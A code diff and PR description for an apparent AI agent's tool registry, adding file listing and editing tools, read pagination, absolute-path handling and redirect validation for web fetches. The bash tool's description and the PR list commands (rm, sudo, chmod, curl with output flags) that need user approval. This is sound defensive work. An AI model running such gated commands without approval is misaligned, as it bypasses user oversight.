@@ -152,6 +133,15 @@ func TestFileList(t *testing.T) {
 	}
 	if !strings.Contains(got, "hello.txt") {
 		t.Errorf("expected file entry 'hello.txt'\ngot: %s", got)
+	}
+}
+
+func TestFileListRequiresPath(t *testing.T) {
+	r, _ := newTestRegistry(t)
+	input := marshalInput(t, map[string]string{})
+	got := r.fileList(input, "u1")
+	if !strings.Contains(got, "path is required") {
+		t.Errorf("expected path required error, got: %s", got)
 	}
 }
 

--- a/tools/registry.go
+++ b/tools/registry.go
@@ -68,6 +68,10 @@ func (r *Registry) Execute(name string, input json.RawMessage, userID string) st
 		return r.fileRead(input, userID)
 	case "file_write":
 		return r.fileWrite(input, userID)
+	case "file_list":
+		return r.fileList(input, userID)
+	case "file_edit":
+		return r.fileEdit(input, userID)
 	default:
 		return fmt.Sprintf("unknown tool: %s", name)
 	}
@@ -77,28 +81,38 @@ func (r *Registry) Defs() []llm.ToolDef {
 	return []llm.ToolDef{
 		{
 			Name:        "web_read",
-			Description: "Fetch a web page and return its readable text content.",
-			Schema:      `{"type":"object","properties":{"url":{"type":"string","description":"The URL to fetch"}},"required":["url"]}`,
+			Description: "Fetch a web page and return its readable text content. Strips scripts, styles, nav, and boilerplate. Prefer this over bash curl for reading web content.",
+			Schema:      `{"type":"object","properties":{"url":{"type":"string","description":"Full URL to fetch (must be http or https)"}},"required":["url"]}`,
 		},
 		{
 			Name:        "web_search",
-			Description: "Search the web. Returns titles, URLs, and snippets.",
-			Schema:      `{"type":"object","properties":{"query":{"type":"string","description":"The search query"}},"required":["query"]}`,
+			Description: "Search the web and return titles, URLs, and snippets for the top results. Use this to find relevant pages, then web_read to get their full content.",
+			Schema:      `{"type":"object","properties":{"query":{"type":"string","description":"Search query"}},"required":["query"]}`,
 		},
 		{
 			Name:        "bash",
-			Description: "Run a bash command.",
-			Schema:      `{"type":"object","properties":{"command":{"type":"string","description":"The command to run"}},"required":["command"]}`,
+			Description: "Run a bash command and return its combined stdout/stderr. Times out after 2 minutes. Commands like rm, sudo, chmod, and curl with output flags require user approval. Non-interactive only — use flags like -y. Prefer file_read/file_write over cat/echo for file operations.",
+			Schema:      `{"type":"object","properties":{"command":{"type":"string","description":"Bash command to execute"}},"required":["command"]}`,
 		},
 		{
 			Name:        "file_read",
-			Description: "Read a file. Supports absolute paths (~/path, /path) or workspace-relative names.",
-			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"}},"required":["path"]}`,
+			Description: "Read a file's contents. Supports absolute paths (/path, ~/path) and workspace-relative names. For large files use offset (1-indexed line number to start from) and limit (number of lines) to paginate. The response header shows which lines are returned and the total.",
+			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"offset":{"type":"integer","description":"Line number to start reading from, 1-indexed (optional)"},"limit":{"type":"integer","description":"Maximum number of lines to return (optional)"}},"required":["path"]}`,
 		},
 		{
 			Name:        "file_write",
-			Description: "Write to a file. Creates directories automatically. Absolute paths require user permission.",
-			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"content":{"type":"string","description":"Content to write"}},"required":["path","content"]}`,
+			Description: "Write content to a file, replacing it entirely. Creates the file and any parent directories if needed. For small changes prefer file_edit — it's safer and cheaper. Paths outside the workspace require user approval.",
+			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"content":{"type":"string","description":"Full content to write"}},"required":["path","content"]}`,
+		},
+		{
+			Name:        "file_list",
+			Description: "List files and directories at a path. Directories have a trailing slash; files show their size. Defaults to the workspace root when no path is given. Use this to explore project structure before reading files.",
+			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"Directory to list (optional, defaults to workspace root)"}},"required":[]}`,
+		},
+		{
+			Name:        "file_edit",
+			Description: "Make a targeted edit to an existing file by replacing an exact string. old_text must appear exactly once in the file — if it appears zero or multiple times the edit is rejected. Safer and cheaper than file_write for small changes.",
+			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"old_text":{"type":"string","description":"Exact text to find (must appear exactly once in the file)"},"new_text":{"type":"string","description":"Text to replace it with"}},"required":["path","old_text","new_text"]}`,
 		},
 	}
 }

--- a/tools/registry.go
+++ b/tools/registry.go
@@ -19,7 +19,7 @@ func configDir() string {
 	if err != nil {
 		return ".nevinho"
 	}
-	return filepath.Join(home, ".config", "nevinho")
+	return filepath.Join(home, ".nevinho")
 }
 
 type Pending struct {
@@ -49,8 +49,8 @@ func NewRegistry(cfg *config.Config) *Registry {
 		pending:  make(map[string]*Pending),
 		permFile: filepath.Join(base, "approved_paths.json"),
 	}
-	if err := os.MkdirAll(filepath.Join(base, "workspace"), 0755); err != nil {
-		log.Printf("failed to create workspace: %v", err)
+	if err := os.MkdirAll(base, 0755); err != nil {
+		log.Printf("failed to create config dir: %v", err)
 	}
 	r.loadApproved()
 	return r
@@ -96,17 +96,17 @@ func (r *Registry) Defs() []llm.ToolDef {
 		},
 		{
 			Name:        "file_read",
-			Description: "Read a file's contents. Supports absolute paths (/path, ~/path) and workspace-relative names. For large files use offset (1-indexed line number to start from) and limit (number of lines) to paginate. The response header shows which lines are returned and the total.",
+			Description: "Read a file's contents. Supports absolute paths (/path, ~/path). For large files use offset (1-indexed line number to start from) and limit (number of lines) to paginate. The response header shows which lines are returned and the total.",
 			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"offset":{"type":"integer","description":"Line number to start reading from, 1-indexed (optional)"},"limit":{"type":"integer","description":"Maximum number of lines to return (optional)"}},"required":["path"]}`,
 		},
 		{
 			Name:        "file_write",
-			Description: "Write content to a file, replacing it entirely. Creates the file and any parent directories if needed. For small changes prefer file_edit — it's safer and cheaper. Paths outside the workspace require user approval.",
+			Description: "Write content to a file, replacing it entirely. Creates the file and any parent directories if needed. For small changes prefer file_edit — it's safer and cheaper. Use absolute paths. Requires directory approval.",
 			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"File path"},"content":{"type":"string","description":"Full content to write"}},"required":["path","content"]}`,
 		},
 		{
 			Name:        "file_list",
-			Description: "List files and directories at a path. Directories have a trailing slash; files show their size. Defaults to the workspace root when no path is given. Use this to explore project structure before reading files.",
+			Description: "List files and directories at a path. Directories have a trailing slash; files show their size. Use absolute paths. Use this to explore project structure before reading files.",
 			Schema:      `{"type":"object","properties":{"path":{"type":"string","description":"Directory to list (optional, defaults to workspace root)"}},"required":[]}`,
 		},
 		{

--- a/tools/web.go
+++ b/tools/web.go
@@ -30,7 +30,18 @@ func (r *Registry) webRead(input json.RawMessage) string {
 		return fmt.Sprintf("blocked: %v", err)
 	}
 
-	client := &http.Client{Timeout: httpTimeout}
+	client := &http.Client{
+		Timeout: httpTimeout,
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			if err := validateURL(req.URL.String()); err != nil {
+				return fmt.Errorf("redirect blocked: %w", err)
+			}
+			if len(via) >= 5 {
+				return fmt.Errorf("too many redirects")
+			}
+			return nil
+		},
+	}
 	resp, err := client.Get(in.URL)
 	if err != nil {
 		return fmt.Sprintf("failed to fetch: %v", err)


### PR DESCRIPTION
## What

This release completes the P1 reliability roadmap: adds automatic retry with exponential backoff and Retry-After parsing, enforces a 5-minute timeout on the chat loop to prevent hung API calls, and wires cost-per-message logging into the output. It also ships the file tools overhaul—new `file_list` and `file_edit` tools, pagination support in `file_read`, and a move to absolute-only paths for clarity and security.

## Changes

- **Retry logic with exponential backoff** — HTTP layer retries on 429/5xx (up to 3 attempts), parses `Retry-After` header for rate limits, respects context cancellation
- **5-minute timeout on Chat()** — Prevents stuck API calls or infinite tool loops from hanging the bot; integrates context through LLM provider interface
- **Cost-per-message logging** — `logger.Done()` now includes estimated USD cost (e.g., `$0.002`)
- **New `file_list` tool** — List directory contents with file sizes; explore structure before reading
- **New `file_edit` tool** — Targeted string replacement in existing files (safer and cheaper than rewriting)
- **Pagination for `file_read`** — `offset` and `limit` parameters for reading large files line-by-line
- **Absolute paths only** — Removed workspace defaults and `isWorkspacePath()` logic; all file operations require absolute paths (`/path` or `~/path`)
- **Improved output truncation** — Bash and file_read now show head + tail when output exceeds limit with a message indicating truncation
- **Redirect validation** — HTTP client now validates and limits redirects in `web_read`
- **Enhanced bash safety** — Added `curl --output` to dangerous patterns list
- **Updated tool descriptions** — Clearer guidance on tool usage in system prompt and registry
- **New HTTP tests** — Coverage for retry, backoff, and context cancellation behavior